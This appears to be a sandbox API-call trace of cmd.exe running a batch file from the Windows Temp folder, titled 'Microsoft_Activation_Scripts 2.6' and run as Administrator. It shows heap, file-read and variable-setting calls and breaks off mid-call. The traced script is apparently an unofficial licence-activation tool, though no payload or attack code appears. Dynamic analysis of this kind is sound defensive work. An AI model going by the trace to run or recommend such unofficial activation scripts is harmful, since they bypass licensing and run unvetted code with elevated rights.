GetProcessHeap () returned 0x19a8f1e0000 [0175.682] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb3c) returned 0x19a8f1eeb50 [0175.682] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb3c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.682] FreeEnvironmentStringsA (penv="=") returned 1 [0175.682] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.682] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.682] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.683] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.683] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.683] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.683] SetConsoleInputExeNameW () returned 0x1 [0175.683] GetConsoleOutputCP () returned 0x1b5 [0175.684] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.684] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.684] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.684] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.684] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.684] SetFilePointer (in: hFile=0x90, lDistanceToMove=2960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb90 [0175.684] GetProcessHeap () returned 0x19a8f1e0000 [0175.685] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0175.685] GetProcessHeap () returned 0x19a8f1e0000 [0175.685] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.685] GetProcessHeap () returned 0x19a8f1e0000 [0175.685] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.685] GetProcessHeap () returned 0x19a8f1e0000 [0175.686] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec840) returned 1 [0175.686] GetProcessHeap () returned 0x19a8f1e0000 [0175.686] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.686] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.686] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb90 [0175.686] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.686] SetFilePointer (in: hFile=0x90, lDistanceToMove=2972, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb9c [0175.686] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _elev=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _elev=\r\nsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n") returned 12 [0175.687] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.687] GetFileType (hFile=0x90) returned 0x1 [0175.687] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.687] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb9c [0175.687] GetProcessHeap () returned 0x19a8f1e0000 [0175.687] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.687] GetProcessHeap () returned 0x19a8f1e0000 [0175.688] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.688] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.691] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.691] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.691] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.691] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.691] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.692] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.692] GetProcessHeap () returned 0x19a8f1e0000 [0175.692] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0175.692] GetProcessHeap () returned 0x19a8f1e0000 [0175.692] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7a0 [0175.692] GetProcessHeap () returned 0x19a8f1e0000 [0175.692] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0175.692] _tell (_FileHandle=3) returned 2972 [0175.692] _close (_FileHandle=3) returned 0 [0175.693] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.693] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.693] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.693] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.693] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.693] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.693] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.693] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.693] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.693] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.694] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.694] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.695] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.695] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.695] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.695] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.695] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.695] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.695] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.695] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.695] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.695] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.695] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.695] GetProcessHeap () returned 0x19a8f1e0000 [0175.695] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0f70 [0175.695] GetProcessHeap () returned 0x19a8f1e0000 [0175.695] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0f70, Size=0x1e) returned 0x19a8f1eb980 [0175.695] GetProcessHeap () returned 0x19a8f1e0000 [0175.696] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb980) returned 0x1e [0175.696] wcsncmp (_String1="_ele", _String2="/", _MaxCount=0x4) returned 48 [0175.696] GetProcessHeap () returned 0x19a8f1e0000 [0175.696] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0175.696] _wcsnicmp (_String1="_e", _String2="/A", _MaxCount=0x2) returned 48 [0175.696] _wcsnicmp (_String1="_e", _String2="/P", _MaxCount=0x2) returned 48 [0175.696] SetEnvironmentVariableW (lpName="_elev", lpValue=0x0) returned 1 [0175.696] GetProcessHeap () returned 0x19a8f1e0000 [0175.697] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.697] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.697] GetProcessHeap () returned 0x19a8f1e0000 [0175.697] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb3c) returned 0x19a8f1eeb50 [0175.697] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb3c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.697] FreeEnvironmentStringsA (penv="=") returned 1 [0175.697] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.697] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.698] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.698] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.698] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.698] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.698] SetConsoleInputExeNameW () returned 0x1 [0175.698] GetConsoleOutputCP () returned 0x1b5 [0175.699] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.699] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.699] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.699] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.699] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.699] SetFilePointer (in: hFile=0x90, lDistanceToMove=2972, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb9c [0175.700] GetProcessHeap () returned 0x19a8f1e0000 [0175.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.700] GetProcessHeap () returned 0x19a8f1e0000 [0175.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0175.700] GetProcessHeap () returned 0x19a8f1e0000 [0175.701] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.701] GetProcessHeap () returned 0x19a8f1e0000 [0175.701] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7a0) returned 1 [0175.701] GetProcessHeap () returned 0x19a8f1e0000 [0175.701] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0175.702] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.702] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb9c [0175.702] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.702] SetFilePointer (in: hFile=0x90, lDistanceToMove=2993, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbb1 [0175.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _MASunattended=\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _MASunattended=\r\nvation_Scripts %masver%\r\n============================================================================================\r\n") returned 21 [0175.702] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.702] GetFileType (hFile=0x90) returned 0x1 [0175.702] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.702] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbb1 [0175.702] GetProcessHeap () returned 0x19a8f1e0000 [0175.702] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.702] GetProcessHeap () returned 0x19a8f1e0000 [0175.703] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.704] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.704] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.704] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.704] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.704] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.704] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.704] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.704] GetProcessHeap () returned 0x19a8f1e0000 [0175.704] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0175.704] GetProcessHeap () returned 0x19a8f1e0000 [0175.704] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec800 [0175.704] GetProcessHeap () returned 0x19a8f1e0000 [0175.704] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e08f0 [0175.704] _tell (_FileHandle=3) returned 2993 [0175.704] _close (_FileHandle=3) returned 0 [0175.705] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.705] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.705] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.705] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.705] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.705] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.705] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.705] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.705] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.705] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.705] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.705] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.705] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.706] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.706] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.706] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.706] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.706] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.706] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.706] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.706] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.706] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.706] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.706] GetProcessHeap () returned 0x19a8f1e0000 [0175.706] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8a60 [0175.706] GetProcessHeap () returned 0x19a8f1e0000 [0175.706] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8a60, Size=0x30) returned 0x19a8f1e0b70 [0175.706] GetProcessHeap () returned 0x19a8f1e0000 [0175.706] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0b70) returned 0x30 [0175.706] wcsncmp (_String1="_MAS", _String2="/", _MaxCount=0x4) returned 48 [0175.706] GetProcessHeap () returned 0x19a8f1e0000 [0175.706] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9400 [0175.706] _wcsnicmp (_String1="_M", _String2="/A", _MaxCount=0x2) returned 48 [0175.706] _wcsnicmp (_String1="_M", _String2="/P", _MaxCount=0x2) returned 48 [0175.706] SetEnvironmentVariableW (lpName="_MASunattended", lpValue=0x0) returned 1 [0175.707] GetProcessHeap () returned 0x19a8f1e0000 [0175.707] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.708] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.708] GetProcessHeap () returned 0x19a8f1e0000 [0175.708] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb3c) returned 0x19a8f1eeb50 [0175.708] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb3c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.708] FreeEnvironmentStringsA (penv="=") returned 1 [0175.708] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.708] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.708] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.708] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.708] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.709] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.709] SetConsoleInputExeNameW () returned 0x1 [0175.709] GetConsoleOutputCP () returned 0x1b5 [0175.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.710] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.710] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.710] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.710] SetFilePointer (in: hFile=0x90, lDistanceToMove=2993, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbb1 [0175.710] GetProcessHeap () returned 0x19a8f1e0000 [0175.710] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9400) returned 1 [0175.710] GetProcessHeap () returned 0x19a8f1e0000 [0175.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b70) returned 1 [0175.711] GetProcessHeap () returned 0x19a8f1e0000 [0175.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08f0) returned 1 [0175.711] GetProcessHeap () returned 0x19a8f1e0000 [0175.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0175.712] GetProcessHeap () returned 0x19a8f1e0000 [0175.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0175.712] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.713] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbb1 [0175.713] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.713] SetFilePointer (in: hFile=0x90, lDistanceToMove=2995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbb3 [0175.713] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt _MASunattended=\r\nvation_Scripts %masver%\r\n============================================================================================\r\n") returned 2 [0175.713] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.713] GetFileType (hFile=0x90) returned 0x1 [0175.713] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.713] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbb3 [0175.714] GetProcessHeap () returned 0x19a8f1e0000 [0175.714] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.714] GetProcessHeap () returned 0x19a8f1e0000 [0175.714] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.714] _tell (_FileHandle=3) returned 2995 [0175.714] _close (_FileHandle=3) returned 0 [0175.715] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.715] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.715] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.715] SetFilePointer (in: hFile=0x90, lDistanceToMove=2995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbb3 [0175.716] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.716] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbb3 [0175.716] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.716] SetFilePointer (in: hFile=0x90, lDistanceToMove=3009, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbc1 [0175.716] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _args=%*\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _args=%*\r\nnded=\r\nvation_Scripts %masver%\r\n============================================================================================\r\n") returned 14 [0175.716] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.717] GetFileType (hFile=0x90) returned 0x1 [0175.717] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.717] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbc1 [0175.717] GetProcessHeap () returned 0x19a8f1e0000 [0175.717] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.717] GetProcessHeap () returned 0x19a8f1e0000 [0175.717] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.718] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.718] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.718] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.718] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.718] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.718] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.718] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.718] GetProcessHeap () returned 0x19a8f1e0000 [0175.718] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0175.718] GetProcessHeap () returned 0x19a8f1e0000 [0175.718] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9c0 [0175.718] GetProcessHeap () returned 0x19a8f1e0000 [0175.719] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0175.719] _tell (_FileHandle=3) returned 3009 [0175.719] _close (_FileHandle=3) returned 0 [0175.719] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.719] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.719] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.719] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.720] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.720] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.720] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.720] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.720] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.720] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.720] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.720] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.720] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.720] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.720] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.720] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.721] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.721] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.721] GetProcessHeap () returned 0x19a8f1e0000 [0175.721] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0f30 [0175.721] GetProcessHeap () returned 0x19a8f1e0000 [0175.721] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0f30, Size=0x1e) returned 0x19a8f1eb860 [0175.721] GetProcessHeap () returned 0x19a8f1e0000 [0175.721] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1e [0175.721] wcsncmp (_String1="_arg", _String2="/", _MaxCount=0x4) returned 48 [0175.721] GetProcessHeap () returned 0x19a8f1e0000 [0175.721] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0175.721] _wcsnicmp (_String1="_a", _String2="/A", _MaxCount=0x2) returned 48 [0175.721] _wcsnicmp (_String1="_a", _String2="/P", _MaxCount=0x2) returned 48 [0175.721] SetEnvironmentVariableW (lpName="_args", lpValue=0x0) returned 1 [0175.721] GetProcessHeap () returned 0x19a8f1e0000 [0175.722] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.722] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.722] GetProcessHeap () returned 0x19a8f1e0000 [0175.722] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb3c) returned 0x19a8f1eeb50 [0175.722] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb3c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.722] FreeEnvironmentStringsA (penv="=") returned 1 [0175.722] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.722] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.722] 